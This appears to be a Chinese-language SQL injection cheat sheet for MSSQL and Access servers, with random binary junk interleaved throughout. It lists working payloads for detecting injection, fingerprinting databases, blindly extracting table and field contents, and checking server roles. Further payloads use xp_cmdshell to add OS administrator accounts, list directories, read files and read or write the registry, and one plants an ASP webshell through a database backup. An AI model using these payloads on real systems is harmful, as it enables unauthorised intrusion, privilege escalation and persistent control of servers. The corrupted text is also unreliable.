1.判断是否有注入;and 1=1 ;and 1=2 �g�
pN�{�1
2.初步判断是否是mssql ;and user>0 �ZS@C�d9�*
h9,u�i^#d$
3.注入参数是字符'and [查询条件] and ''=' �{�%K(O$H#
{[�
�j�+�y
4.搜索时没过滤参数的'and [查询条件] and '%25'=' AK/_^?zA�s
xA-O?s"�CY
5.判断数据库系统 ~7tG�%{t%
����t7#C&B
;and (select count(*) from sysobjects)>0 mssql �
2L~[dn.s
VemgG)\���
;and (select count(*) from msysobjects)>0 access ��fT-y��Y`
e5_:15%�R\
t�c%?{�W\
}��>\+�e�G
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %G& Zm$u=�
}kaU�0 P��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =�X?j�Id�{
�s5X .(;+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 \�7QAk4I~
R��<+�K&_�
9.(1)猜字段的ascii值(access) ���opK��=Z
Ldnw��1�xy
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 2-��9'zN0u
]u�rr�AIK�
(2)猜字段的ascii值(mssql) ^d�!��(8vh
Y�P���raf$
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +SG��M3tY
�85P7I=`*d
10.测试权限结构(mssql) �G'/�36M�@
��!A�(*?0`
oe�$�Y=`�
$�2=-Q�/lM
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- N��b2]}; O
ssv�4#8p3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �6>! ;g'k�
�ppt�`5F O
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- � �R�^We�d
�sEj?,1j�k
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- b$�kCy�Og�
�?d)I!x,;;
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- J+3PUfg>@R
�20G�..>zW
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \Lxsg!�wtJ
Y]ML-sm��N
;and 1=(select IS_MEMBER('db_owner'));-- ���Sq,ZzMw
��s7?Q[�vN
�t1,s�G8�Z
�LHjGl��By
11.添加mssql和系统的帐户 Y�4]USU!PA
�zK`z*�\��
;exec master.dbo.sp_addlogin username;-- \K+LK��a)�
;exec master.dbo.sp_password null,username,password;-- �}v[*V ���
z\V�u`Y�z�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^z�Pa^lo-
;Ub;A�q��Y
;exec master.dbo.xp_cmdshell 'net user username password u%�FG%
j?C
&h�.�E
B��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ^NB�@wu�f7
�"wi=aV9j
;exec master.dbo.xp_cmdshell 'net user username password /add';-- )J&�1uMp{�
FI�1R7��A�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �q(0V#kKC�
�hX\z93an�
eqK6`gHa�6
�B[��:-SWd
12.(1)遍历目录 9ZjSM���,+
`<�>Emc8�Z
;create table dirs(paths varchar(100), id int) i�rSd�qa/�
7@�R;lOzL3
;insert dirs exec master.dbo.xp_dirtree 'c:\' !�BD+H/A.{
s�fSM7�f��
;and (select top 1 paths from dirs)>0 �tSK{Abw1B
.!T]s�X�_P
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) R9X*�R3nB
^&iUC&�8W�
��+Z0@z^6\
)jbY�WR�*&
(2)遍历目录 <X}@af�S��
L�4I1n���l
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- zG|}| /�/}
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 rt�r��0� d
\��;
I��o
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 deR2l(0%yr
4R��5+�"h:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �V:*��QK�,
M#II�,�z>q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 9�V*h:[6a(
ZSj^\J��U�
@N?�A�0S�/
z}v6!u|iZu
13.mssql中的存储过程 Mq!03q��6�
�Y_n^��6 ;
xp_regenumvalues 注册表根键, 子键 �d&n&_���>
g3@Qn?(j!�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 k�IS_��6!�
W)^0~[`i�
xp_regread 根键,子键,键值名 �G�j]*_�"T
z�-�*/�jFE
;exec xp_regread .C����fi�/
�n:cre}�0.
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 S�Xn�\k;F<
�@l�~zn%!X
xp_regwrite 根键,子键, 值名, 值类型, 值 �|)� �{)w`
��s� u�]x
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 J1kG�'cH05
)8Defu��xk
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 +�~l�Z]a7k
i9?$BZQ�[R
xp_regdeletevalue 根键,子键,值名 (rV#EA+6[`
aW-'Jg=@H^
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Bi�?�+e~R
B>�, O@�og
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 O�p^r�}7��
$OK}jSH*v)
%l�s�k>��V
a=�3�?hVpB
14.mssql的backup创建webshell /*D�C`,��q
���rJ)O�(�
use model YK� Nz[x$|
Jw��zkd"D
create table cmd(str image); z>$AZ>t%J$
K@u\^6419�
insert into cmd(str) values (''); Yo�y}Zdu}h
_Wn5*
Pi%Z
backup database model to disk='c:\l.asp'; -�gZI^E�II
U�� �� �JO
P+��r�-t�8
�p3Uus''V4
15.mssql内置函数 71i".1�l{K
t>[K:[0�U
;and (select @@version)>0 获得Windows的版本号 ~������Ti�
"I.�PV$Rxl
;and user_name()='dbo' 判断当前系统的连接用户是不是sa M$�j��]V�Z
_<x4/".}B3
;and (select user_name())>0 爆当前系统的连接用户 zb/w^~J�_i
(orO=gST-/
;and (select db_name())>0 得到当前连接的数据库 ���X�!r9��
|����R�k$u
�5nL�,sF�d
z.itVQs$I
16.简洁的webshell qE73M5L�&
s�r(f��9Vl
use model -�z%|�
�Jk
wmu#@Hf/[h
create table cmd(str image); o�'S&��YD�
|ho|Kl `=�
insert into cmd(str) values (''); B�a-��Ftkb
ts r���c�X
backup database model to disk='g:\wwwtest\l.asp';
